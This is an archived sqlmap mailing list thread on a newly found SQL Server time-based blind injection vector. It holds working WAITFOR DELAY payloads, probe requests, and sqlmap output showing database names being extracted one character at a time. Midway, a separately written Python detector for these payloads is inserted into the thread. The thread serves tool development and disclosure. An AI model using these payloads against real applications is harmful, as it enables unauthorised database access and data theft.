Thread: [sqlmap-users] New SQL Server blind test
From: Steve P. <ste...@gm...> - 2011-01-17 23:43:12
Attachments:
smime.p7s
SQL_server-time_based.diff
Highly based on the "Microsoft SQL Server/Sybase stacked queries" test, which was throwing unrelated 500 errors on the ASP application I was testing due to the semicolons. This worked for data extraction for me.

Not sure if one or the other of them should be moved to a higher level to limit testing time in the general case? Anyone have more experience with which one would be more useful?

svn diff based on revision 3014.

Patch licensed under GPLv2 to match the project license, if the patch is used. I assume that's the normal procedure for this project?

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:02:59
Hi Steve.

Thank you for your patch but I am not sure from SQL's perspective how this could work?

So, basically, you are proposing time based sql injection payload (e.g.):

IF(1=1) WAITFOR DELAY '0:0:1'

and to be honest, I am not sure in which form, other than "stacked" this could fit in??

KR

On Tue, Jan 18, 2011 at 12:42 AM, Steve Pinkham <ste...@gm...> wrote:
> Highly based on the "Microsoft SQL Server/Sybase stacked queries" test,
> which was throwing unrelated 500 errors on the ASP application I was
> testing due to the semicolons. This worked for data extraction for me.
>
> Not sure if one or the other of them should be moved to a higher level
> to limit testing time in the general case? Anyone have more experience
> with which one would be more useful?
>
> svn diff based on revision 3014.
>
> Patch licensed under GPLv2 to match the project license, if the patch is
> used. I assume that's the normal procedure for this project?
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |
>
> ------------------------------------------------------------------------------
> Protect Your Site and Customers from Malware Attacks
> Learn about various malware tactics and how to avoid them. Understand
> malware threats, the impact they can have on your business, and how you
> can protect your company and customers by using code signing.
> http://p.sf.net/sfu/oracle-sfdevnl
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:23:20
now i am really interested as hell :))

could you please just send one proper payload (use -v 3) which uses this vector? "i want to know"

On Tue, Jan 18, 2011 at 1:02 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Steve.
>
> Thank you for your patch but I am not sure from SQL's perspective how
> this could work?
>
> So, basically, you are proposing time based sql injection payload (e.g.):
>
> IF(1=1) WAITFOR DELAY '0:0:1'
>
> and to be honest, I am not sure in which form, other than "stacked"
> this could fit in??
>
> KR
>
> On Tue, Jan 18, 2011 at 12:42 AM, Steve Pinkham <ste...@gm...> wrote:
>> Highly based on the "Microsoft SQL Server/Sybase stacked queries" test,
>> which was throwing unrelated 500 errors on the ASP application I was
>> testing due to the semicolons. This worked for data extraction for me.
>>
>> Not sure if one or the other of them should be moved to a higher level
>> to limit testing time in the general case? Anyone have more experience
>> with which one would be more useful?
>>
>> svn diff based on revision 3014.
>>
>> Patch licensed under GPLv2 to match the project license, if the patch is
>> used. I assume that's the normal procedure for this project?
>> --
>> | Steven Pinkham, Security Consultant |
>> | http://www.mavensecurity.com |
>> | GPG public key ID CD31CAFB |
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia
>

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Steve P. <ste...@gm...> - 2011-01-18 00:48:25
Attachments:
smime.p7s
On 01/17/2011 07:02 PM, Miroslav Stampar wrote:
> Hi Steve.
>
> Thank you for your patch but I am not sure from SQL's perspective how
> this could work?
>
> So, basically, you are proposing time based sql injection payload (e.g.):
>
> IF(1=1) WAITFOR DELAY '0:0:1'
>
> and to be honest, I am not sure in which form, other than "stacked"
> this could fit in??
>
> KR
>

Dunno, not a SQL guru, just know it works on SQL Server 2008 anyway ;-)
Should work as an OR or AND statement, but then the present logical state of the query matters.

Here's the output from my successful run using the patch, sanitised for public viewing:

./sqlmap.py -u https://BogusExample.com/Login******.asp --method=POST --data='id=asdf&pwd=asdf' -p id --time-sec=20 --dbms='Microsoft SQL Server'

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 05:54:02

[05:54:02] [INFO] using 'bogonExampleData' as session file
[05:54:02] [INFO] testing connection to the target url
[05:54:02] [WARNING] the testable parameter 'id' you provided is not into the Cookie
[05:54:02] [INFO] testing if the url is stable, wait a few seconds
[05:54:04] [INFO] url is stable
[05:54:08] [WARNING] heuristic test shows that POST parameter 'id' might not be injectable
[05:54:08] [INFO] testing sql injection on POST parameter 'id'
[05:54:08] [INFO] testing 'AND boolean-based blind - WHERE clause'
[05:54:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE clause'
[05:54:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based'
[05:55:02] [INFO] POST parameter 'id' is 'Microsoft SQL Server/Sybase time-based' injectable
[05:55:02] [INFO] testing 'Generic NULL UNION query - 1 to 3 columns'
POST parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 31 HTTP(s) requests:
---
Place: POST
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase time-based
Payload: id=asdf' WAITFOR DELAY '0:0:20'-- AND 'uNsX'='uNsX&pwd=asdf
---

[05:55:18] [INFO] testing Microsoft SQL Server
[05:55:38] [INFO] confirming Microsoft SQL Server
[05:56:40] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[05:56:40] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 18 times
[05:56:40] [INFO] Fetched data logged to text files under 'bogonExampleData'

[*] shutting down at: 05:56:40

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:54:43
hi again.

have you tried to use it? i am interested in data retrieval part :)))))

(please use -v 3)

kr

On Tue, Jan 18, 2011 at 1:48 AM, Steve Pinkham <ste...@gm...> wrote:
> On 01/17/2011 07:02 PM, Miroslav Stampar wrote:
>> Hi Steve.
>>
>> Thank you for your patch but I am not sure from SQL's perspective how
>> this could work?
>>
>> So, basically, you are proposing time based sql injection payload (e.g.):
>>
>> IF(1=1) WAITFOR DELAY '0:0:1'
>>
>> and to be honest, I am not sure in which form, other than "stacked"
>> this could fit in??
>>
>> KR
>>
> Dunno, not a SQL guru, just know it works on SQL Server 2008 anyway ;-)
> Should work as an OR or AND statement, but then the present logical
> state of the query matters.
>
>
> Here's the output from my successful run using the patch, sanitised for
> public viewing:
> ./sqlmap.py -u https://BogusExample.com/Login******.asp --method=POST
> --data='id=asdf&pwd=asdf' -p id --time-sec=20 --dbms='Microsoft SQL Server'
>
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 05:54:02
>
> [05:54:02] [INFO] using 'bogonExampleData' as session file
> [05:54:02] [INFO] testing connection to the target url
> [05:54:02] [WARNING] the testable parameter 'id' you provided is not
> into the Cookie
> [05:54:02] [INFO] testing if the url is stable, wait a few seconds
> [05:54:04] [INFO] url is stable
> [05:54:08] [WARNING] heuristic test shows that POST parameter 'id' might
> not be injectable
> [05:54:08] [INFO] testing sql injection on POST parameter 'id'
> [05:54:08] [INFO] testing 'AND boolean-based blind - WHERE clause'
> [05:54:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
> WHERE clause'
> [05:54:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based'
> [05:55:02] [INFO] POST parameter 'id' is 'Microsoft SQL Server/Sybase
> time-based' injectable
> [05:55:02] [INFO] testing 'Generic NULL UNION query - 1 to 3 columns'
> POST parameter 'id' is vulnerable. Do you want to keep testing the
> others? [y/N]
> sqlmap identified the following injection points with a total of 31
> HTTP(s) requests:
> ---
> Place: POST
> Parameter: id
> Type: stacked queries
> Title: Microsoft SQL Server/Sybase time-based
> Payload: id=asdf' WAITFOR DELAY '0:0:20'-- AND 'uNsX'='uNsX&pwd=asdf
> ---
>
> [05:55:18] [INFO] testing Microsoft SQL Server
> [05:55:38] [INFO] confirming Microsoft SQL Server
> [05:56:40] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows Vista
> web application technology: ASP.NET, ASP, Microsoft IIS 7.0
> back-end DBMS: Microsoft SQL Server 2008
> [05:56:40] [WARNING] HTTP error codes detected during testing:
> 500 (Internal Server Error) - 18 times
> [05:56:40] [INFO] Fetched data logged to text files under 'bogonExampleData'
> [*] shutting down at: 05:56:40
>
>
>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |
>
>

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Steve P. <ste...@gm...> - 2011-01-18 01:17:58
Attachments:
smime.p7s
On 01/17/2011 07:54 PM, Miroslav Stampar wrote:
> hi again.
>
> have you tried to use it? i am interested in data retrieval part :)))))
>
> (please use -v 3)
>
> kr

Can you be more specific as to what you would like to see? I have to redact the data for a few reasons, and the less I can send the better...

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Steve P. <ste...@gm...> - 2011-01-18 01:20:18
Attachments:
smime.p7s
On 01/17/2011 07:54 PM, Miroslav Stampar wrote:
> hi again.
>
> have you tried to use it? i am interested in data retrieval part :)))))
>
> (please use -v 3)
>
> kr
>

And yes, I have pulled data with it. That's where the time based data with a few errors came from before.

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Miroslav S. <mir...@gm...> - 2011-01-18 01:25:20
ok, fair enough.

please just send one of payloads used for data retrieval (something like this one):

[02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > 104), SLEEP(5), 9290)

you'll see them with -v 3. you can censor table names. please, i just want to see something workable used for data retrieval (just spot those payloads with '>' inside)

kr

On Tue, Jan 18, 2011 at 2:20 AM, Steve Pinkham <ste...@gm...> wrote:
> On 01/17/2011 07:54 PM, Miroslav Stampar wrote:
>> hi again.
>>
>> have you tried to use it? i am interested in data retrieval part :)))))
>>
>> (please use -v 3)
>>
>> kr
>>
> And yes, I have pulled data with it. That's where the time based data
> with a few errors came from before.
>
>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |
>
>

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Steve P. <ste...@gm...> - 2011-01-18 01:34:02
Attachments:
smime.p7s
On 01/17/2011 06:48 PM, Bernardo Damele A. G. wrote:
> Steve,
>
>
> Are you saying that a query like:
>
> SELECT foo FROM table WHERE id=1 WAITFOR DELAY '0:0:10'
>
> is MSSQL-syntactically correct and works? If so, odd news :)

Yes, sometimes interesting discoveries come from not knowing any better, and flinging poo at the app. ;-)

Unfortunately, I don't have a MS test lab available, but I can confirm that the injection works just fine on this SQL Server 2008 / ASP classic application, and can't think of another reason why it would.

First I tested in burp, with post data:
id=asdf'IF('1'%3d'1')+WAITFOR+DELAY+'0:0:20&pwd=asdf
there is a 23 second delay with the app, and with
id=asdf'IF('1'%3d'2')+WAITFOR+DELAY+'0:0:20&pwd=asdf
there is a 3 second delay.

After adding the patch, sqlmap has so far extracted enough of the version details and banner to be sure the patch works on this particular app.

I wish I had a bunch of SQL server versions to test it on, but I don't at the moment. Anyone else have a MSDN subscription or test lab already built who can verify this is repeatable?

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Miroslav S. <mir...@gm...> - 2011-01-18 01:48:02
Steve.

i owe you an apology and congrats - it appears that you've found a new injection vector.

it looks like an SQL abomination, and I still can't believe it, but it appears that this really works:

SELECT * FROM users WHERE id=1 IF(1=1) WAITFOR DELAY '0:0:1'

i repeat, it looks like an SQL abomination but it works. i've just tried with SSMS.

kr

p.s. i am still shocked :)
p.p.s. you are directly going into doc/THANKS :)

On Tue, Jan 18, 2011 at 2:33 AM, Steve Pinkham <ste...@gm...> wrote:
> On 01/17/2011 06:48 PM, Bernardo Damele A. G. wrote:
>> Steve,
>>
>>
>> Are you saying that a query like:
>>
>> SELECT foo FROM table WHERE id=1 WAITFOR DELAY '0:0:10'
>>
>> is MSSQL-syntactically correct and works? If so, odd news :)
>
> Yes, sometimes interesting discoveries come from not knowing any better,
> and flinging poo at the app. ;-)
>
> Unfortunately, I don't have a MS test lab available, but I can confirm
> that the injection works just fine on this SQL Server 2008 / ASP classic
> application, and can't think of another reason why it would.
>
> First I tested in burp, with post data:
> id=asdf'IF('1'%3d'1')+WAITFOR+DELAY+'0:0:20&pwd=asdf
> there is a 23 second delay with the app, and with
> id=asdf'IF('1'%3d'2')+WAITFOR+DELAY+'0:0:20&pwd=asdf
> there is a 3 second delay.
>
> After adding the patch, sqlmap has so far extracted enough of the
> version details and banner to be sure the patch works on this particular
> app.
>
> I wish I had a bunch of SQL server versions to test it on, but I don't
> at the moment. Anyone else have a MSDN subscription or test lab already
> built who can verify this is repeatable?
>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |
>
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Steve P. <ste...@gm...> - 2011-01-18 02:11:54
Attachments:
smime.p7s
On 01/17/2011 08:47 PM, Miroslav Stampar wrote:
> Steve.
>
> i owe you an apology and congrats - it appears that you've found a new
> injection vector.
>
> it looks like an SQL abomination, and I still can't believe it, but it
> appears that this really works:
>
> SELECT * FROM users WHERE id=1 IF(1=1) WAITFOR DELAY '0:0:1'
>
> i repeat, it looks like an SQL abomination but it works. i've just
> tried with SSMS.
>
> kr
>
> p.s. i am still shocked :)
> p.p.s. you are directly going into doc/THANKS :)
>

You're welcome. If sqlmap wasn't so easy to add new vectors to, I probably never would have shared that this works, just for not knowing no one else knew it works ;-)

Thanks for an excellent product. (both of you, and all the other contributors over the years)

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Steve P. <ste...@gm...> - 2011-01-18 01:59:22
Attachments:
smime.p7s
On 01/17/2011 08:25 PM, Miroslav Stampar wrote:
> ok, fair enough.
>
> please just send one of payloads used for data retrieval (something
> like this one):
>
> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > 104), SLEEP(5), 9290)
>
> you'll see them with -v 3. you can censor table names. please, i just
> want to see something workable used for data retrieval (just spot
> those payloads with '>' inside)
>
> kr

Since you seem anxious, I'll send the warm up.. Hasn't hit the good part yet. ;-)

[09:41:40] [INFO] fetching database names
[09:41:40] [INFO] fetching number of databases
[09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:41:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:37] [INFO] retrieved: 24
[09:43:37] [DEBUG] performed 10 queries in 117 seconds

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
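From a defender's side, the two posts above (the Burp probe with its 23 s versus 3 s answers, and the sqlmap retrieval payloads) show what this vector looks like in a web server's access records: a WAITFOR DELAY literal, no semicolon, a conditional IF(...) around it, and during retrieval an ASCII(SUBSTRING(...)) > N comparison. The following is an added example, not code from the thread, the patch or sqlmap. It decodes request bodies, pulls out the requested delay and compares it with the observed response time, so that a payload that actually slept the server can be told apart from one that was merely attempted or rejected with a 500. The record layout and every function name are this example's own; the sample records are constructed, modelled on the payloads quoted in the thread.

```python
"""Spot T-SQL time-based blind injection in web access records and tell
payloads that demonstrably executed apart from mere attempts.

Added example for this thread; not code from sqlmap or from the patch under
discussion. Record layout and function names are this example's own.
"""
import re
from urllib.parse import unquote_plus

# WAITFOR DELAY 'h:m:s' with the delay literal captured, so the requested
# sleep can be compared with how long the server actually took to answer.
WAITFOR_RE = re.compile(r"WAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)", re.IGNORECASE)
# IF( ... ) WAITFOR is the conditional form from the thread: the delay only
# fires when the injected condition is true.
CONDITIONAL_RE = re.compile(r"\bIF\s*\(", re.IGNORECASE)
# ASCII(SUBSTRING(...)) > N is the per-character comparison sqlmap issues
# once it has moved from probing to data retrieval.
INFERENCE_RE = re.compile(r"ASCII\s*\(\s*SUBSTRING\s*\(.*\)\s*>\s*\d+", re.IGNORECASE)


def requested_delay_seconds(decoded_body):
    """Seconds the payload asked the server to sleep, or None if no WAITFOR."""
    m = WAITFOR_RE.search(decoded_body)
    if m is None:
        return None
    hours, minutes, seconds = (int(x) for x in m.groups())
    return hours * 3600 + minutes * 60 + seconds


def classify(record):
    """Finding for one access record, or None if it carries no WAITFOR.

    record: {'client', 'body', 'status', 'latency_s'} (constructed layout).
    """
    decoded = unquote_plus(record["body"])
    delay = requested_delay_seconds(decoded)
    if delay is None:
        return None
    inference = INFERENCE_RE.search(decoded) is not None
    return {
        "client": record["client"],
        "status": record["status"],
        "requested_delay_s": delay,
        "latency_s": record["latency_s"],
        # Semicolon-separated stacked form versus the bare IF(...) WAITFOR form.
        "stacked": ";" in decoded,
        "conditional": CONDITIONAL_RE.search(decoded) is not None,
        # A response that took at least the requested delay means the DELAY
        # ran: the injection executed rather than merely being attempted.
        "delay_fired": record["latency_s"] >= delay,
        # 5xx usually means the payload broke the query instead of running.
        "rejected": record["status"] >= 500,
        "phase": "extraction" if inference else "probe",
    }


def analyse(records):
    """All findings for a batch of records, in input order."""
    return [f for f in map(classify, records) if f is not None]


def summarise(findings):
    """Per-client view: attempts, whether any delay demonstrably fired, and
    how many records were already character-retrieval steps."""
    summary = {}
    for f in findings:
        s = summary.setdefault(f["client"], {"attempts": 0, "confirmed": False, "extraction_steps": 0})
        s["attempts"] += 1
        s["confirmed"] = s["confirmed"] or f["delay_fired"]
        s["extraction_steps"] += 1 if f["phase"] == "extraction" else 0
    return summary


# Constructed records (not real traffic). Timings follow the thread: a true
# condition answered in ~23 s against a 20 s delay, a false one in ~3 s.
SAMPLE_RECORDS = [
    {"client": "203.0.113.7", "status": 200, "latency_s": 23.1,
     "body": "id=asdf'IF('1'%3d'1')+WAITFOR+DELAY+'0:0:20&pwd=asdf"},
    {"client": "203.0.113.7", "status": 200, "latency_s": 3.0,
     "body": "id=asdf'IF('1'%3d'2')+WAITFOR+DELAY+'0:0:20&pwd=asdf"},
    # Stacked-query form, which the application in the thread answered with 500.
    {"client": "203.0.113.7", "status": 500, "latency_s": 0.4,
     "body": "id=asdf'%3B+WAITFOR+DELAY+'0:0:20'--&pwd=asdf"},
    # Retrieval step: is the first digit of the database count > '3' (ASCII 51)?
    {"client": "203.0.113.7", "status": 200, "latency_s": 0.5,
     "body": ("id=asdf'IF(ASCII(SUBSTRING((SELECT+ISNULL(CAST(LTRIM(STR(COUNT(name)))"
              "+AS+VARCHAR(8000)),+CHAR(32))+FROM+master..sysdatabases),+1,+1))+>+51)"
              "+WAITFOR+DELAY+'0:0:12'--+AND+'MQWi'%3D'MQWi&pwd=asdf")},
    # Ordinary login, no WAITFOR anywhere.
    {"client": "198.51.100.4", "status": 200, "latency_s": 0.2,
     "body": "id=alice&pwd=correct-horse"},
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_RECORDS):
        print(finding)
    print(summarise(analyse(SAMPLE_RECORDS)))
```

The point of comparing requested delay with observed latency is that a single slow response proves nothing on its own, but a response that took at least as long as the literal in the payload (23 s against '0:0:20') is the same evidence the tester used, read from the other side; a WAITFOR that comes back in well under the requested time either had a false condition or never reached the engine. Because the thread's form needs no semicolon, a filter that only looks for stacked queries misses it, which is why the regexes key on the WAITFOR literal itself.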
From: Miroslav S. <mir...@gm...> - 2011-01-18 02:05:55
well, i've apologized already. i've realized 15 minutes ago that this really is a new sql injection vector.

you can find yourself in the latest revision commit of doc/THANKS file.

kr

On Tue, Jan 18, 2011 at 2:59 AM, Steve Pinkham <ste...@gm...> wrote:
> On 01/17/2011 08:25 PM, Miroslav Stampar wrote:
>> ok, fair enough.
>>
>> please just send one of payloads used for data retrieval (something
>> like this one):
>>
>> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > 104), SLEEP(5), 9290)
>>
>> you'll see them with -v 3. you can censor table names. please, i just
>> want to see something workable used for data retrieval (just spot
>> those payloads with '>' inside)
>>
>> kr
>
> Since you seem anxious, I'll send the warm up.. Hasn't hit the good part
> yet. ;-)
>
> [09:41:40] [INFO] fetching database names
> [09:41:40] [INFO] fetching number of databases
> [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:41:40] [WARNING] time-based comparison needs larger statistical
> model. Making a few dummy requests, please wait..
> [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:37] [INFO] retrieved: 24
> [09:43:37] [DEBUG] performed 10 queries in 117 seconds
>
>
>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |
>
>

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-01-18 02:08:52
"Since you seem anxious, I'll send the warm up." - you've thought that i was kidding :)

it was really a sincere mail and this is the core part:
"it looks like an SQL abomination, and I still can't believe it, but it appears that this really works"

On Tue, Jan 18, 2011 at 3:05 AM, Miroslav Stampar <mir...@gm...> wrote:
> well, i've apologized already. i've realized 15 minutes ago that this
> really is a new sql injection vector.
>
> you can find yourself in the latest revision commit of doc/THANKS file.
>
> kr
>
> On Tue, Jan 18, 2011 at 2:59 AM, Steve Pinkham <ste...@gm...> wrote:
>> On 01/17/2011 08:25 PM, Miroslav Stampar wrote:
>>> ok, fair enough.
>>>
>>> please just send one of payloads used for data retrieval (something
>>> like this one):
>>>
>>> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > 104), SLEEP(5), 9290)
>>>
>>> you'll see them with -v 3. you can censor table names. please, i just
>>> want to see something workable used for data retrieval (just spot
>>> those payloads with '>' inside)
>>>
>>> kr
>>
>> Since you seem anxious, I'll send the warm up.. Hasn't hit the good part
>> yet. ;-)
>>
>> [09:41:40] [INFO] fetching database names
>> [09:41:40] [INFO] fetching number of databases
>> [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
